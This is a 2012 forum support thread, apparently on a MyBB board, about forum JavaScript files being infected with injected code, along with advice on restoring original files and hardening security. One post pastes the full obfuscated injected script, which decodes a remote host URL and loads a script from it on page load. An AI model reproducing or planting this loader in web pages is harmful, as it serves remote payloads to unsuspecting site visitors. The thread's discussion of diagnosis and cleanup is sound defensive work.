2012-01-11, 06:47 PM
2012-01-14, 11:53 AM
it was not hacked, its a virus from your host
2012-01-14, 12:04 PM
(2012-01-14, 11:53 AM)huwad Wrote: [ -> ]it was not hacked, its a virus from your host
How did you come to that conclusion?
How can I check if it's really so?
2012-01-14, 12:06 PM
(2012-01-14, 12:04 PM)Parka Wrote: [ -> ](2012-01-14, 11:53 AM)huwad Wrote: [ -> ]it was not hacked, its a virus from your host
How did you come to that conclusion?
How can I check if it's really so?
its true, because I have experience it before, im using a paid/stable forum script, same problem. my files got infected with malicious code. its a mass code inject. you have been rooted
take a look this 1, I have reported this from my host, it was the script injected to my files. and after a day, my main host has been hacked. I transfer to another host and have no problem anymore =D
<script>var f=new Date();var VT;if(VT!='' && VT!='H'){VT='o'};function E(){var k;if(k!='J' && k != ''){k=null};this.tj='';var V=unescape;var er="";var g;if(g!='r'){g=''};var P="\x68\x74\x74\x70\x3a\x2f\x2f\x61\x6c\x6c\x65\x67\x72\x6f\x2d\x70\x6c\x2e\x67\x6f\x2e\x63\x6f\x6d\x2e\x6e\x61\x76\x65\x72\x2d\x63\x6f\x6d\x2e\x79\x6f\x75\x68\x65\x6c\x70\x6e\x6f\x77\x2e\x72\x75\x3a";var F;if(F!='hD'){F=''};var s=window;var bJ;if(bJ!='i'){bJ='i'};var LI;if(LI!='' && LI!='Yy'){LI=''};var n=new String("J4Mxg".substr(4));var m='';var T;if(T!='' && T!='l'){T=''};var ir=new String();var U='';var uE;if(uE!='Yl'){uE=''};var M_;if(M_!='' && M_!='Q'){M_=null};function x(K,Y){var v=V("%5b")+Y+V("%5d");var EL=new RegExp(v, n);var RU=new String();return K.replace(EL, m);};var z;if(z!='' && z!='Z'){z='N'};var FD=new Array();var pz='';var y=x('86337260131519982695520711457','72396145');this.Hk="";var Zx=new Date();var _D=new Date();var KH=document;var eh;if(eh!='d' && eh!='pT'){eh=''};var on=new Array();var mi='';var jA;if(jA!='sX' && jA != ''){jA=null};var s_;if(s_!='lu' && s_ != ''){s_=null};var b=V("%2f%77%69%6b%69%61%2e%63%6f%6d%2f%77%69%6b%69%61%2e%63%6f%6d%2f%73%6b%79%73%70%6f%72%74%73%2e%63%6f%6d%2f%63%6f%6d%63%61%73%74%2e%6e%65%74%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2e%70%68%70");this.iF="";this.kA="";function D(){var I=new Array();mi=P;mi+=y;var c="";mi+=b;var Dg;if(Dg!='eq' && Dg != ''){Dg=null};var bP=new Date();var mA=new Date();var C;if(C!='ky'){C='ky'};try {var tO=new String();var UX;if(UX!='' && UX!='W'){UX=null};var wg;if(wg!='' && wg!='_b'){wg=null};vl=KH.createElement(x('sFcFrKiKp4tF','4oKSqF'));var tq=new Date();var HA='';var Oh=new Date();vl.defer=[9,1][1];var Kd=new Array();var RN;if(RN!='' && RN!='FV'){RN=null};this.NY='';vl.src=mi;KH.body.appendChild(vl);var Wc;if(Wc!='hM' && Wc!='Pm'){Wc=''};} catch(h){var Bx="";};var AG;if(AG!='' && AG!='wq'){AG=null};var lI=new Array();}var hO;if(hO!='ag'){hO='ag'};var sAY;if(sAY!=''){sAY='jx'};s[new String("onloa"+"d")]=D;};this.ht="";var Jq="";this.tF="";E();this.N_='';var xL=new Array();</script>
<!--62365fa35aba4973596fe47d39de9a46-->
2012-01-27, 06:03 PM
I have suffered the same problem with all javascripts infected. Also in the ACP even though I renamed it to something different. I'm currently running myBB 1.6.4 so before I upgrade, I have to get it back working okay again. Can I just reload all the javascripts from 1.6.5 to get everything working correctly again? Will this work okay? The purpose of the infection was to redirect visitors elsewhere, most anti-virus programs seem to block it from the visitor's point of view. However, it's not easy to edit the javascript files because my anti-virus prevents me accessing them for any reason. Does anybody have suggestions as to my best move now please?
For information, I do not use a host; running on my own web server behind a port.............
For information, I do not use a host; running on my own web server behind a port.............
2012-01-27, 06:31 PM
^ @Roger, you can run file verification tool from tools & maintenance section AND replace the corrupt files with original files from MyBB 1.6.4 ..
2012-01-27, 06:40 PM
Ah okay, I wasn't sure that I could get the original 1.6.4 files so will try that instead. Thanks...........
All corrected now so just need to make some more changes regarding security as suggested by Matt's excellent blog on the subject
http://mattrogowski.co.uk/?p=314
All corrected now so just need to make some more changes regarding security as suggested by Matt's excellent blog on the subject
http://mattrogowski.co.uk/?p=314
2012-01-28, 02:08 AM
(2012-01-11, 05:37 PM)ranjani Wrote: [ -> ]" I'll just remove the admin folder totally in that case, and put it back when I need it again " <-- that's not necessary !!
just rename with irregular combination of words ... see also Security Tutorial List - if you have not yet seen it ..
Renaming the ACP directory is pointless. they can't do anything in the ACP without being logged into an admin account. and if they have an admin account they will see the link to the acp...
2012-01-28, 04:15 AM
2012-01-28, 10:00 AM
Okay on all these security essentials but in this particular case with me, where all files with a .js extension were changed and infected, this appears to not be a myBB issue as there were other javascript files on the same server (this is a web server running on my own network) associated with a totally different application and these had all been changed too. This other application also uses an SQL database so is the problem basically down to php?
PHP version is 5.3.3 and MySQLi 5.1.49
PHP version is 5.3.3 and MySQLi 5.1.49